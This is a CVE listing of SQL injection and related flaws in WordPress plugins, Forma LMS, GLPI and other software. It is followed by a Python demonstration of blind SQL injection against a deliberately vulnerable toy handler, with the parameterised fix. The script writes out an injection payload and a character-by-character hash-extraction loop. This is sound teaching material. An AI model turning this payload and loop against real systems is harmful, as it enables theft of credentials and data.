Total: 14188 CVEs
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2021-24651 | 1 Ays-pro | 1 Poll Maker | 2022-11-09 | 5.0 MEDIUM | 7.5 HIGH |
| The Poll Maker WordPress plugin before 3.4.2 allows unauthenticated users to perform SQL injection via the ays_finish_poll AJAX action. While the result is not disclosed in the response, it is possible to use a timing attack to exfiltrate data such as password hash. | |||||
| CVE-2021-24626 | 1 Chameleon Css Project | 1 Chameleon Css | 2022-11-09 | 6.5 MEDIUM | 8.8 HIGH |
| The Chameleon CSS WordPress plugin through 1.2 does not have any CSRF or capability checks in any of its AJAX calls, allowing any authenticated user, such as a subscriber, to call them and perform unauthorised actions. One of the AJAX calls, remove_css, also does not sanitise or escape the css_id POST parameter before using it in a SQL statement, leading to a SQL injection. | |||||
| CVE-2021-24555 | 1 Roosty | 1 Diary-availability-calendar | 2022-11-09 | 6.5 MEDIUM | 8.8 HIGH |
| The daac_delete_booking_callback function, hooked to the daac_delete_booking AJAX action, takes the id POST parameter which is passed into the SQL statement without proper sanitisation, validation or escaping, leading to a SQL Injection issue. Furthermore, the ajax action is lacking any CSRF and capability check, making it available to any authenticated user. | |||||
| CVE-2022-27380 | 2 Debian, Mariadb | 2 Debian Linux, Mariadb | 2022-11-08 | 5.0 MEDIUM | 7.5 HIGH |
| An issue in the component my_decimal::operator= of MariaDB Server v10.6.3 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements. | |||||
| CVE-2022-41671 | 1 Schneider-electric | 2 Ecostruxure Operator Terminal Expert, Pro-face Blue | 2022-11-08 | N/A | 7.8 HIGH |
| A CWE-89: Improper Neutralization of Special Elements used in SQL Command ('SQL Injection') vulnerability exists that allows adversaries with local user privileges to craft a malicious SQL query and execute it as part of project migration, which could result in execution of malicious code. Affected Products: EcoStruxure Operator Terminal Expert (V3.3 Hotfix 1 or prior), Pro-face BLUE (V3.3 Hotfix 1 or prior). | |||||
| CVE-2022-38537 | 1 Archerydms | 1 Archery | 2022-11-08 | N/A | 9.8 CRITICAL |
| Archery v1.4.5 to v1.8.5 was discovered to contain multiple SQL injection vulnerabilities via the start_file, end_file, start_time, and stop_time parameters in the binlog2sql interface. | |||||
| CVE-2022-38541 | 1 Archerydms | 1 Archery | 2022-11-07 | N/A | 9.8 CRITICAL |
| Archery v1.8.3 to v1.8.5 was discovered to contain multiple SQL injection vulnerabilities via the start_time and stop_time parameters in the my2sql interface. | |||||
| CVE-2022-39323 | 1 Glpi-project | 1 Glpi | 2022-11-03 | N/A | 9.8 CRITICAL |
| GLPI stands for Gestionnaire Libre de Parc Informatique. GLPI is a Free Asset and IT Management Software package that provides ITIL Service Desk features, licenses tracking and software auditing. A time-based blind SQL injection exists in the REST API's user_token handling. This issue has been patched, please upgrade to version 10.0.4. As a workaround, disable login with user_token on the REST API. | |||||
| CVE-2022-41680 | 1 Formalms | 1 Formalms | 2022-11-01 | N/A | 6.5 MEDIUM |
| Forma LMS on its 3.1.0 version and earlier is vulnerable to a SQL injection vulnerability. The exploitation of this vulnerability could allow an authenticated attacker (with the role of student) to perform a SQL injection on the 'search[value]' parameter in the 'appLms/ajax.server.php?r=mycertificate/getMyCertificates' function in order to dump the entire database. | |||||
| CVE-2022-42923 | 1 Formalms | 1 Formalms | 2022-11-01 | N/A | 8.8 HIGH |
| Forma LMS on its 3.1.0 version and earlier is vulnerable to a SQL injection vulnerability. The exploitation of this vulnerability could allow an authenticated attacker (with the role of student) to perform a SQL injection on the 'id' parameter in the 'appCore/index.php?r=adm/mediagallery/delete' function in order to dump the entire database or delete all contents from the 'core_user_file' table. | |||||
| CVE-2018-9309 | 1 Zzcms | 1 Zzcms | 2022-11-01 | 5.0 MEDIUM | 9.8 CRITICAL |
| An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in a dl/dl_sendsms.php request. | |||||
| CVE-2018-8967 | 1 Zzcms | 1 Zzcms | 2022-11-01 | 7.5 HIGH | 9.8 CRITICAL |
| An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in an adv2.php?action=modify request. | |||||
| CVE-2022-42924 | 1 Formalms | 1 Formalms | 2022-11-01 | N/A | 6.5 MEDIUM |
| Forma LMS on its 3.1.0 version and earlier is vulnerable to a SQL injection vulnerability. The exploitation of this vulnerability could allow an authenticated attacker (with the role of student) to perform a SQL injection on the 'dyn_filter' parameter in the 'appLms/ajax.adm_server.php?r=widget/userselector/getusertabledata' function in order to dump the entire database. | |||||
| CVE-2021-36898 | 1 Expresstech | 1 Quiz And Survey Master | 2022-10-31 | N/A | 7.2 HIGH |
| Authenticated SQL Injection (SQLi) vulnerability in the Quiz And Survey Master WordPress plugin <= 7.3.4. | |||||
| CVE-2022-1014 | 1 Labarta | 1 Wp Contacts Manager | 2022-10-29 | 7.5 HIGH | 9.8 CRITICAL |
| The WP Contacts Manager WordPress plugin through 2.2.4 fails to properly sanitize user supplied POST data before it is being interpolated in an SQL statement and then executed, leading to an SQL injection vulnerability. | |||||
| CVE-2021-43362 | 1 Meddata | 1 Hbys | 2022-10-29 | 7.5 HIGH | 9.8 CRITICAL |
| Due to improper sanitization, MedData HBYS software suffers from a remote SQL injection vulnerability. An unauthenticated attacker with web access is able to extract critical information from the system. | |||||
| CVE-2022-22524 | 1 Gavazziautomation | 3 Cpy Car Park Server, Uwp 3.0 Monitoring Gateway And Controller, Uwp 3.0 Monitoring Gateway And Controller Firmware | 2022-10-28 | N/A | 9.4 CRITICAL |
| In Carlo Gavazzi UWP3.0 (multiple versions) and CPY Car Park Server 2.8.3, an unauthenticated remote attacker could use a SQL injection vulnerability to gain full database access, modify users and stop services. | |||||
| CVE-2022-22389 | 4 Ibm, Linux, Microsoft and 1 more | 4 Db2, Linux Kernel, Windows and 1 more | 2022-10-28 | 4.0 MEDIUM | 6.5 MEDIUM |
| IBM Db2 for Linux, UNIX and Windows 9.7, 10.1, 10.5, 11.1, and 11.5 is vulnerable to a denial of service as the server may terminate abnormally when executing specially crafted SQL statements by an authenticated user. IBM X-Force ID: 2219740. | |||||
| CVE-2022-28452 | 1 Redplanetcomputers | 1 Laundry Management System | 2022-10-28 | 7.5 HIGH | 9.8 CRITICAL |
| Red Planet Laundry Management System 1.0 is vulnerable to SQL Injection. | |||||
| CVE-2021-43361 | 1 Meddata | 1 Hbys | 2022-10-28 | 7.5 HIGH | 9.8 CRITICAL |
| Due to improper sanitization, MedData HBYS software suffers from a remote SQL injection vulnerability. An unauthenticated attacker with web access is able to extract critical information from the system. | |||||
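Several entries above share one root cause: a request parameter is interpolated into a SQL string (CVE-2021-24555's `id`, CVE-2022-1014's POST data), and in the blind cases (CVE-2021-24651, CVE-2022-39323) the attacker never sees query output, only a yes/no or fast/slow response, yet still recovers a password hash one character at a time. The following added example is not code from any of the listed products; it reduces that handler pattern to Python and an in-memory SQLite database with a constructed `users`/`polls` schema and a constructed sample hash, shows the character-by-character extraction against the interpolating handler, and shows that the parameterised handler returns nothing useful to the same payloads. Because SQLite has no `SLEEP()`, the oracle here is boolean (row matched or not) rather than timing; the extraction logic is otherwise identical to a time-based attack, which would read the delay instead of the match flag.

```python
"""
Added example (not from any product in the table): an AJAX-style "finish poll"
handler reduced to Python + sqlite3. The vulnerable variant interpolates the
poll id into SQL; the fixed variant binds it. The caller only learns whether a
row matched, which is enough for blind extraction of a stored hash.
"""
import sqlite3

HEX = "0123456789abcdef"  # alphabet of a hex-encoded hash


def setup_db() -> sqlite3.Connection:
    """Constructed sample schema: one user with a (fake) hash and one poll."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'deadbeefcafe')")  # constructed, not a real hash
    conn.execute("CREATE TABLE polls (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO polls VALUES (7, 'favourite colour')")
    return conn


def finish_poll_vulnerable(conn: sqlite3.Connection, poll_id: str) -> bool:
    """Hypothetical handler: the POST parameter is spliced into the SQL text.
    Returns only whether a poll row matched, mirroring 'result not disclosed'."""
    sql = f"SELECT id FROM polls WHERE id = '{poll_id}'"
    return conn.execute(sql).fetchone() is not None


def finish_poll_fixed(conn: sqlite3.Connection, poll_id: str) -> bool:
    """Same handler with a bound parameter: the value is data, never SQL."""
    row = conn.execute("SELECT id FROM polls WHERE id = ?", (poll_id,)).fetchone()
    return row is not None


def blind_extract_hash(handler, conn: sqlite3.Connection, login: str, length: int) -> str:
    """Boolean-based blind extraction. For each position, ask the oracle
    'is character <pos> of <login>'s hash equal to <c>?' and keep the first
    'yes'. A timing attack swaps the match flag for a measured delay.
    Stops early (returning what it has) if no character matches, i.e. when
    the handler does not act as an oracle."""
    recovered = ""
    for pos in range(1, length + 1):
        for c in HEX:
            # Payload closes the id literal, appends the probe, comments out the rest.
            payload = (
                f"7' AND (SELECT substr(pass_hash,{pos},1) FROM users "
                f"WHERE login='{login}') = '{c}' -- "
            )
            if handler(conn, payload):
                recovered += c
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", blind_extract_hash(finish_poll_vulnerable, db, "admin", 12))
    print("fixed:     ", repr(blind_extract_hash(finish_poll_fixed, db, "admin", 12)))
```

Each probe costs one request, so a 32-character MD5 or 64-character SHA-256 hash falls in at most 16 requests per character, which is why "result not disclosed" is no mitigation. For the WordPress entries the fix is `$wpdb->prepare()` (the bound-parameter equivalent of `finish_poll_fixed`) plus a nonce and capability check on the AJAX action, since several of the listed handlers were reachable by any authenticated user regardless of role.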
